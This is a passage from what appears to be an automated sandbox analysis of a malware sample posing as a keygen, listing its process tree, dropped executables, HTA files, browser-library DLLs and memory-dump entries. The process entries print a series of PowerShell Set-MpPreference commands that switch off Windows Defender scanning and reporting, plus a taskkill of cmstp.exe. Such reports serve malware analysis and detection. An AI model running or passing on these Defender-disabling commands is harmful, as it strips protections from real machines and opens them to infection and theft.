C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\ipjk2yso.exe2⤵
-
C:\Windows\temp\ipjk2yso.exeC:\Windows\temp\ipjk2yso.exe3⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6AF4EE75E3A4ABA658C0087EB9A0BB5B_569A6A04C8591541F7E990B56F9661DA
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_979AB563CEB98F2581C14ED89B8957D4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6AF4EE75E3A4ABA658C0087EB9A0BB5B_569A6A04C8591541F7E990B56F9661DA
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_979AB563CEB98F2581C14ED89B8957D4
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZipHA1oS1L.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\k7OXQaTnHC.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\owIRnLSEZY.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\r9bcktZEdK.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\viu1oJ97BK.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\XU7HD9FX.cookie
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Temp\8487.tmp\Keygen.exe
-
C:\Users\Admin\AppData\Local\Temp\8487.tmp\Keygen.exe
-
C:\Users\Admin\AppData\Local\Temp\8487.tmp\b.hta
-
C:\Users\Admin\AppData\Local\Temp\8487.tmp\b1.hta
-
C:\Users\Admin\AppData\Local\Temp\8487.tmp\ba.hta
-
C:\Users\Admin\AppData\Local\Temp\8487.tmp\ba1.hta
-
C:\Users\Admin\AppData\Local\Temp\8487.tmp\m.hta
-
C:\Users\Admin\AppData\Local\Temp\8487.tmp\m1.hta
-
C:\Users\Admin\AppData\Local\Temp\8487.tmp\start.bat
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
-
C:\Users\Admin\AppData\Local\Temp\WbzfV6CULA.exe
-
C:\Users\Admin\AppData\Local\Temp\WbzfV6CULA.exe
-
C:\Users\Admin\AppData\Local\Temp\WbzfV6CULA.exe
-
C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe
-
C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe
-
C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe
-
C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
-
C:\Users\Admin\AppData\Local\Temp\k7OXQaTnHC.exe
-
C:\Users\Admin\AppData\Local\Temp\k7OXQaTnHC.exe
-
C:\Users\Admin\AppData\Local\Temp\k7OXQaTnHC.exe
-
C:\Users\Admin\AppData\Local\Temp\owIRnLSEZY.exe
-
C:\Users\Admin\AppData\Local\Temp\owIRnLSEZY.exe
-
C:\Users\Admin\AppData\Local\Temp\owIRnLSEZY.exe
-
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
-
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
-
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
-
C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe
-
C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe
-
C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe
-
C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe
-
C:\Users\Admin\AppData\Local\Temp\tr1M5TzQok.exe
-
C:\Users\Admin\AppData\Local\Temp\tr1M5TzQok.exe
-
C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe
-
C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe
-
C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe
-
C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe
-
C:\Users\Admin\AppData\Local\Temp\ys0nsVDvlk.exe
-
C:\Users\Admin\AppData\Local\Temp\ys0nsVDvlk.exe
-
C:\Users\Public\XqKMNtso.bat
-
C:\Users\Public\omx.exe
-
C:\Users\Public\omx.exe
-
C:\Users\Public\omx.exe
-
C:\Users\Public\xvb.exe
-
C:\Users\Public\xvb.exe
-
C:\Users\Public\xvb.exe
-
C:\Users\Public\ywq.exe
-
C:\Users\Public\ywq.exe
-
C:\Windows\Temp\ipjk2yso.exeMD5
f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA25688e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA51202a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e
-
C:\Windows\Temp\mmfwhmpi.exeMD5
f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA25688e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA51202a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e
-
C:\Windows\temp\fbsgi511.inf
-
C:\Windows\temp\ipjk2yso.exeMD5
f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA25688e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA51202a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e
-
C:\Windows\temp\mmfwhmpi.exeMD5
f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA25688e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA51202a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e
-
C:\Windows\temp\pcidrymb.inf
-
\ProgramData\mozglue.dll
-
\ProgramData\mozglue.dll
-
\ProgramData\nss3.dll
-
\ProgramData\nss3.dll
-
\ProgramData\sqlite3.dll
-
\ProgramData\sqlite3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll
-
\Users\Admin\AppData\LocalLow\sqlite3.dll
-
\Users\Admin\AppData\LocalLow\sqlite3.dll
-
memory/476-125-0x0000000000000000-mapping.dmp
-
memory/576-343-0x00007FFC35450000-0x00007FFC35E3C000-memory.dmpFilesize
9.9MB
-
memory/576-331-0x0000000000000000-mapping.dmp
-
memory/984-325-0x0000000000000000-mapping.dmp
-
memory/984-330-0x00007FFC35450000-0x00007FFC35E3C000-memory.dmpFilesize
9.9MB
-
memory/1028-691-0x0000000000417A8B-mapping.dmp
-
memory/1028-687-0x0000000000400000-0x0000000000434000-memory.dmpFilesize
208KB
-
memory/1028-695-0x0000000000400000-0x0000000000434000-memory.dmpFilesize
208KB
-
memory/1156-279-0x0000000000000000-mapping.dmp
-
memory/1156-314-0x00000000092E0000-0x00000000092E1000-memory.dmpFilesize
4KB
-
memory/1156-307-0x0000000009320000-0x0000000009353000-memory.dmpFilesize
204KB
-
memory/1156-315-0x0000000009450000-0x0000000009451000-memory.dmpFilesize
4KB
-
memory/1156-280-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/1156-288-0x0000000007A90000-0x0000000007A91000-memory.dmpFilesize
4KB
-
memory/1156-333-0x0000000006E10000-0x0000000006E11000-memory.dmpFilesize
4KB
-
memory/1156-338-0x0000000006E00000-0x0000000006E01000-memory.dmpFilesize
4KB
-
memory/1156-292-0x0000000008510000-0x0000000008511000-memory.dmpFilesize
4KB
-
memory/1192-320-0x0000000000000000-mapping.dmp
-
memory/1192-326-0x00007FFC35450000-0x00007FFC35E3C000-memory.dmpFilesize
9.9MB
-
memory/1312-804-0x0000000000000000-mapping.dmp
-
memory/1752-33-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/1752-25-0x0000000000000000-mapping.dmp
-
memory/1872-294-0x0000000000000000-mapping.dmp
-
memory/1872-299-0x0000000000410000-0x0000000000411000-memory.dmpFilesize
4KB
-
memory/1872-298-0x00007FFC35450000-0x00007FFC35E3C000-memory.dmpFilesize
9.9MB
-
memory/1872-801-0x0000000000000000-mapping.dmp
-
memory/1872-293-0x0000000000000000-mapping.dmp
-
memory/2012-10-0x0000000000000000-mapping.dmp
-
memory/2044-289-0x0000000000000000-mapping.dmp
-
memory/2168-805-0x0000000000000000-mapping.dmp
-
memory/2180-250-0x000000000040616E-mapping.dmp
-
memory/2180-249-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/2180-253-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/2224-53-0x00000000084F0000-0x00000000084F1000-memory.dmpFilesize
4KB
-
memory/2224-95-0x0000000009810000-0x0000000009811000-memory.dmpFilesize
4KB
-
memory/2224-15-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/2224-29-0x0000000007D40000-0x0000000007D41000-memory.dmpFilesize
4KB
-
memory/2224-97-0x000000000A5F0000-0x000000000A5F1000-memory.dmpFilesize
4KB
-
memory/2224-49-0x0000000007BD0000-0x0000000007BD1000-memory.dmpFilesize
4KB
-
memory/2224-50-0x0000000008770000-0x0000000008771000-memory.dmpFilesize
4KB
-
memory/2224-96-0x0000000009200000-0x0000000009201000-memory.dmpFilesize
4KB
-
memory/2224-12-0x0000000000000000-mapping.dmp
-
memory/2404-827-0x00007FFC35220000-0x00007FFC35C0C000-memory.dmpFilesize
9.9MB
-
memory/2404-822-0x0000000000000000-mapping.dmp
-
memory/2420-788-0x0000000000000000-mapping.dmp
-
memory/2440-147-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/2440-145-0x0000000000417A8B-mapping.dmp
-
memory/2440-141-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/2468-24-0x0000000000000000-mapping.dmp
-
memory/2528-123-0x0000000000000000-mapping.dmp
-
memory/2536-795-0x000000000040DDD4-mapping.dmp
-
memory/2536-797-0x0000000000400000-0x0000000000418000-memory.dmpFilesize
96KB
-
memory/2536-794-0x0000000000400000-0x0000000000418000-memory.dmpFilesize
96KB
-
memory/2544-20-0x0000000000000000-mapping.dmp
-
memory/2600-3-0x0000000000000000-mapping.dmp
-
memory/2600-2-0x0000000000000000-mapping.dmp
-
memory/2616-576-0x0000000000000000-mapping.dmp
-
memory/2616-579-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/2644-9-0x0000000000000000-mapping.dmp
-
memory/2792-816-0x0000000000000000-mapping.dmp
-
memory/2792-821-0x00007FFC35220000-0x00007FFC35C0C000-memory.dmpFilesize
9.9MB
-
memory/2856-0-0x0000000000000000-mapping.dmp
-
memory/3180-7-0x0000000000000000-mapping.dmp
-
memory/3612-14-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/3612-16-0x00000000041A0000-0x00000000041A1000-memory.dmpFilesize
4KB
-
memory/3612-73-0x0000000009460000-0x0000000009461000-memory.dmpFilesize
4KB
-
memory/3612-18-0x0000000006C80000-0x0000000006C81000-memory.dmpFilesize
4KB
-
memory/3612-77-0x0000000008A10000-0x0000000008A11000-memory.dmpFilesize
4KB
-
memory/3612-13-0x0000000000000000-mapping.dmp
-
memory/3612-34-0x00000000075F0000-0x00000000075F1000-memory.dmpFilesize
4KB
-
memory/3612-31-0x0000000007320000-0x0000000007321000-memory.dmpFilesize
4KB
-
memory/3612-26-0x0000000006C10000-0x0000000006C11000-memory.dmpFilesize
4KB
-
memory/3656-344-0x0000000000000000-mapping.dmp
-
memory/3656-352-0x00007FFC35450000-0x00007FFC35E3C000-memory.dmpFilesize
9.9MB
-
memory/3736-492-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/3736-489-0x000000000041A684-mapping.dmp
-
memory/3736-487-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/3884-144-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/3884-137-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/3884-140-0x000000000041A684-mapping.dmp
-
memory/3896-806-0x0000000000000000-mapping.dmp
-
memory/3920-826-0x0000000000000000-mapping.dmp
-
memory/3920-834-0x00007FFC35220000-0x00007FFC35C0C000-memory.dmpFilesize
9.9MB
-
memory/3960-23-0x0000000000000000-mapping.dmp
-
memory/3976-673-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/3976-670-0x000000000040616E-mapping.dmp
-
memory/4036-842-0x0000000000000000-mapping.dmp
-
memory/4036-849-0x00007FFC35220000-0x00007FFC35C0C000-memory.dmpFilesize
9.9MB
-
memory/4092-346-0x0000000000000000-mapping.dmp
-
memory/4092-353-0x00007FFC35450000-0x00007FFC35E3C000-memory.dmpFilesize
9.9MB
-
memory/4104-37-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/4104-27-0x0000000000000000-mapping.dmp
-
memory/4132-117-0x0000000004CF0000-0x0000000004CF1000-memory.dmpFilesize
4KB
-
memory/4132-106-0x0000000000000000-mapping.dmp
-
memory/4132-122-0x00000000081D0000-0x00000000081E4000-memory.dmpFilesize
80KB
-
memory/4132-110-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/4132-118-0x0000000004C30000-0x0000000004C31000-memory.dmpFilesize
4KB
-
memory/4132-121-0x00000000086C0000-0x00000000086C1000-memory.dmpFilesize
4KB
-
memory/4132-114-0x0000000000340000-0x0000000000341000-memory.dmpFilesize
4KB
-
memory/4132-227-0x0000000008600000-0x0000000008601000-memory.dmpFilesize
4KB
-
memory/4132-226-0x00000000084A0000-0x000000000855A000-memory.dmpFilesize
744KB
-
memory/4152-183-0x0000000000000000-mapping.dmp
-
memory/4188-185-0x0000000000000000-mapping.dmp
-
memory/4204-235-0x0000000000400000-0x0000000000493000-memory.dmpFilesize
588KB
-
memory/4204-241-0x0000000000400000-0x0000000000493000-memory.dmpFilesize
588KB
-
memory/4204-237-0x000000000043FA56-mapping.dmp
-
memory/4220-337-0x0000000000000000-mapping.dmp
-
memory/4220-345-0x00007FFC35450000-0x00007FFC35E3C000-memory.dmpFilesize
9.9MB
-
memory/4244-228-0x00000000055C0000-0x00000000055F9000-memory.dmpFilesize
228KB
-
memory/4244-229-0x00000000058A0000-0x00000000058B6000-memory.dmpFilesize
88KB
-
memory/4244-198-0x0000000000970000-0x0000000000971000-memory.dmpFilesize
4KB
-
memory/4244-197-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/4244-194-0x0000000000000000-mapping.dmp
-
memory/4252-305-0x000002615DDC0000-0x000002615DDC1000-memory.dmpFilesize
4KB
-
memory/4252-316-0x0000026178290000-0x0000026178291000-memory.dmpFilesize
4KB
-
memory/4252-301-0x0000000000000000-mapping.dmp
-
memory/4252-304-0x00007FFC35450000-0x00007FFC35E3C000-memory.dmpFilesize
9.9MB
-
memory/4264-616-0x0000000000000000-mapping.dmp
-
memory/4312-328-0x0000000000000000-mapping.dmp
-
memory/4312-773-0x0000000000000000-mapping.dmp
-
memory/4312-341-0x00007FFC35450000-0x00007FFC35E3C000-memory.dmpFilesize
9.9MB
-
memory/4320-799-0x0000000000000000-mapping.dmp
-
memory/4344-303-0x0000000000000000-mapping.dmp
-
memory/4348-829-0x00007FFC35220000-0x00007FFC35C0C000-memory.dmpFilesize
9.9MB
-
memory/4348-823-0x0000000000000000-mapping.dmp
-
memory/4360-828-0x0000000000000000-mapping.dmp
-
memory/4360-836-0x00007FFC35220000-0x00007FFC35C0C000-memory.dmpFilesize
9.9MB
-
memory/4412-230-0x0000000000000000-mapping.dmp
-
memory/4412-234-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/4412-466-0x0000000008480000-0x00000000084C7000-memory.dmpFilesize
284KB
-
memory/4412-245-0x00000000008A0000-0x00000000008A1000-memory.dmpFilesize
4KB
-
memory/4436-319-0x0000000000000000-mapping.dmp
-
memory/4436-323-0x00007FFC35450000-0x00007FFC35E3C000-memory.dmpFilesize
9.9MB
-
memory/4440-135-0x0000000000400000-0x0000000000497000-memory.dmpFilesize
604KB
-
memory/4440-130-0x0000000000400000-0x0000000000497000-memory.dmpFilesize
604KB
-
memory/4440-132-0x000000000043FA56-mapping.dmp
-
memory/4464-60-0x0000000000000000-mapping.dmp
-
memory/4496-213-0x0000000000000000-mapping.dmp
-
memory/4536-66-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/4536-61-0x0000000000000000-mapping.dmp
-
memory/4620-65-0x0000000000000000-mapping.dmp
-
memory/4640-844-0x00007FFC35220000-0x00007FFC35C0C000-memory.dmpFilesize
9.9MB
-
memory/4640-837-0x0000000000000000-mapping.dmp
-
memory/4660-838-0x00007FFC35220000-0x00007FFC35C0C000-memory.dmpFilesize
9.9MB
-
memory/4660-830-0x0000000000000000-mapping.dmp
-
memory/4724-771-0x0000000050480000-0x000000005049A000-memory.dmpFilesize
104KB
-
memory/4724-202-0x0000000000000000-mapping.dmp
-
memory/4724-371-0x0000000004D10000-0x0000000004D61000-memory.dmpFilesize
324KB
-
memory/4724-302-0x00000000041C0000-0x000000000421C000-memory.dmpFilesize
368KB
-
memory/4736-71-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/4736-69-0x0000000000000000-mapping.dmp
-
memory/4824-148-0x0000000000000000-mapping.dmp
-
memory/4836-782-0x00007FFC35220000-0x00007FFC35C0C000-memory.dmpFilesize
9.9MB
-
memory/4836-778-0x0000000000000000-mapping.dmp
-
memory/4836-779-0x0000000000000000-mapping.dmp
-
memory/4840-332-0x00007FFC35450000-0x00007FFC35E3C000-memory.dmpFilesize
9.9MB
-
memory/4840-327-0x0000000000000000-mapping.dmp
-
memory/4844-688-0x0000000000000000-mapping.dmp
-
memory/4844-721-0x0000000001100000-0x0000000001201000-memory.dmpFilesize
1.0MB
-
memory/4844-739-0x0000000001060000-0x0000000001061000-memory.dmpFilesize
4KB
-
memory/4844-712-0x0000000001060000-0x0000000001061000-memory.dmpFilesize
4KB
-
memory/4848-212-0x0000000000000000-mapping.dmp
-
memory/4848-220-0x0000000000A50000-0x0000000000A51000-memory.dmpFilesize
4KB
-
